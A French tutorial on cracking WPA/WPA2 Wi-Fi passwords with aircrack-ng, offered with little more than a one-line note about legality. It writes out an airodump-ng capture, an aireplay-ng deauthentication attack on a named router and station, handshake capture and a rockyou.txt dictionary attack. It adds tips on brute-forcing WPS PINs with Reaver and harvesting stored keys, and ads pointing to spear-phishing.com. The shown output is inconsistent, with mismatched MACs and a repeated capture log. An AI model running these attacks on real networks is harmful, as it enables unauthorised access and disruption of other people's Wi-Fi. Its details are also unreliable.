Cassage :

Les Fondamentaux du Cassage avec Aircrack-ng

Le cassage de mots de passe est un aspect fondamental de la cybersécurité et du pentesting, et Aircrack-ng est un outil incontournable dans ce domaine. Cette section se concentre sur l'utilisation d'Aircrack-ng pour le cassage des mots de passe des réseaux Wi-Fi, en exploitant principalement les techniques d'attaque par dictionnaire.

Le cassage avec Aircrack-ng implique l'utilisation de techniques avancées pour décrypter les mots de passe des réseaux sans fil. Cela inclut l'analyse des vulnérabilités courantes, telles que les mots de passe faibles et les configurations de sécurité obsolètes, permettant ainsi d'identifier et de corriger les faiblesses avant qu'elles ne soient exploitées malicieusement.

Aircrack-ng

3.0 - Cassage :

Le cassage de mots de passe Wi-Fi, une pratique essentielle en cybersécurité, permet d'évaluer et de renforcer la sécurité des réseaux sans fil. Aircrack-ng sous Kali Linux est un outil clé pour ces tests.

Hannah Swann aircrack-ng / aircrack-ng Mister-X- CI: Add Fedora 39

Astuce : Utilisez WirelessKeyView pour récupérer les clés de sécurité des réseaux Wi-Fi stockées sur votre PC. Ce logiciel fonctionne avec Windows XP à Windows 10, y compris Windows Server 2008, et vous permet de sauvegarder les clés WEP/WPA dans des fichiers texte, HTML ou XML. Vous pouvez aussi exporter ces clés pour les utiliser sur un autre ordinateur. C'est un outil parfait pour enrichir votre liste de mots de passe personnalisée, en y incluant des éléments spécifiques comme des dates inversées ou des surnoms, ce qui augmente vos chances lors d'attaques par dictionnaire sur des réseaux précédemment inaccessibles.

Zip File Password : WKey4567#
Exclusivement sur : spear-phishing.com
Plus de détails

Aircrack-ng

3.1 Préparation

L'analyse du réseau cible, la vérification de l'adéquation de votre matériel (notamment une carte réseau compatible avec le mode moniteur), et la confirmation que tous les outils nécessaires sont installés sur Kali Linux. Il est essentiel de mener vos tests dans un cadre légal et sécurisé, tout en possédant une compréhension solide des protocoles de sécurité Wi-Fi.

Astuce : Utilisez Reaver sur Kali Linux pour exploiter les faiblesses du WPS. Cet outil lance des attaques de force brute contre les PINs WPS pour récupérer les passphrases WPA/WPA2. Reaver est efficace contre de nombreux routeurs avec WPS activé par défaut, et peut généralement craquer les PINs en 4 à 10 heures. Cette méthode souligne l'importance de désactiver le WPS pour renforcer la sécurité Wi-Fi​

Exclusivement sur : spear-phishing.com
Plus de détails

        
sudo airodump-ng -c 4 --bssid 6C:5A:BO:F2:60:81 -w TPLINK wlan0
CH 4 ][ Elapsed: 1 min ][ 2024-11-11 10:11 ]
BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
6C:5A:B0:F2:60:81  -59  8  10          0    4  270  WPA2 CCMP   PSK  TP-Link_6081
BSSID              STATION            PWR  Rate  Lost  Frames  Probes
6C:5A:B0:F2:60:81  D6:85:26:2A:5D:DB  -60  54 - 1  14     3       7
6C:5A:B0:F2:60:81  32:7E:AD:CD:94:D5  -45  48 - 1  332    7       2
6C:5A:B0:F2:60:81  EF:57:11:D8:68:4C  -54  36 - 1  27     4       5
6C:5A:B0:F2:60:81  27:12:B8:58:2C:27  -63  6 - 54  19     1       8
6C:5A:B0:F2:60:81  34:CD:45:9F:BA:30  -54  9 - 54  23     6       3
6C:5A:B0:F2:60:81  AF:24:13:92:AB:CD  -69  12 - 48 210    9       6
6C:5A:B0:F2:60:81  3E:E2:3D:51:06:CB  -71  18 - 36 121    8       4
6C:5A:B0:F2:60:81  6B:61:24:D9:F5:00  -52  24 - 36 98     5       9

Aircrack-ng

3.2 - Maîtriser l'Attaque de Désauthentification

Apprenez comment une simple attaque de désauthentification peut révéler la sécurité d'un réseau Wi-Fi. Nous expliquons l'usage de l'outil aireplay-ng pour déconnecter une station et capturer le handshake WPA/WPA2, un élément clé pour comprendre la sécurité du réseau.


        
sudo aireplay-ng --deauth 10 -a 6C:5A:B0:F2:60:81 -c DA:26:08:90:EA:2D wlan0
13:07:19  Waiting for beacon frame (BSSID: 6C:5A:BO:F2:60:81) on channel 4
13:07:21  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:22  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:22  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:23  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:24  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:25  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:26  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:27  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:28  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]
13:07:29  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

Aircrack-ng

3.3 - Capture du Handshake WPA

Après notre attaque de désauthentification, nous avons réussi à capturer le handshake WPA du réseau. Cette étape est essentielle pour tester la sécurité du réseau Wi-Fi, car elle nous donne accès aux clés de cryptage utilisées lors de la connexion.


        
sudo airodump-ng -c 4 --bssid 6C:5A:BO:F2:60:81 -w TPLINK wlan0
CH 4 ][ Elapsed: 1 min ][ 2024-11-11 10:11 ][ WPA handshake: 6C:5A:B0:F2:60:81
BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
6C:5A:B0:F2:60:81  -59  8  10          0    4  270  WPA2 CCMP   PSK  TP-Link_6081
BSSID              STATION            PWR  Rate  Lost  Frames  Probes
6C:5A:B0:F2:60:81  D6:85:26:2A:5D:DB  -60  54 - 1  14     3       7
6C:5A:B0:F2:60:81  32:7E:AD:CD:94:D5  -45  48 - 1  332    7       2
6C:5A:B0:F2:60:81  EF:57:11:D8:68:4C  -54  36 - 1  27     4       5
6C:5A:B0:F2:60:81  27:12:B8:58:2C:27  -63  6 - 54  19     1       8
6C:5A:B0:F2:60:81  34:CD:45:9F:BA:30  -54  9 - 54  23     6       3
6C:5A:B0:F2:60:81  AF:24:13:92:AB:CD  -69  12 - 48 210    9       6
6C:5A:B0:F2:60:81  3E:E2:3D:51:06:CB  -71  18 - 36 121    8       4
6C:5A:B0:F2:60:81  6B:61:24:D9:F5:00  -52  24 - 36 98     5       9

Aircrack-ng

3.4 Attaque par Dictionnaire avec rockyou.txt

L'attaque par dictionnaire utilisant rockyou.txt dans Aircrack-ng est une méthode efficace pour casser les mots de passe Wi-Fi. rockyou.txt contient une vaste collection de mots de passe réels, ce qui la rend idéale pour identifier les faiblesses courantes des mots de passe dans les réseaux sans fil.

Important : Le fichier rockyou.txt.gz est une liste de mots de passe communément utilisée en pentesting. Il contient des millions de mots de passe réels qui ont été exposés lors de diverses violations de données. Cette liste est souvent utilisée pour les attaques par dictionnaire car elle représente un large éventail de mots de passe fréquemment utilisés par les gens.

rockyou.txt.gz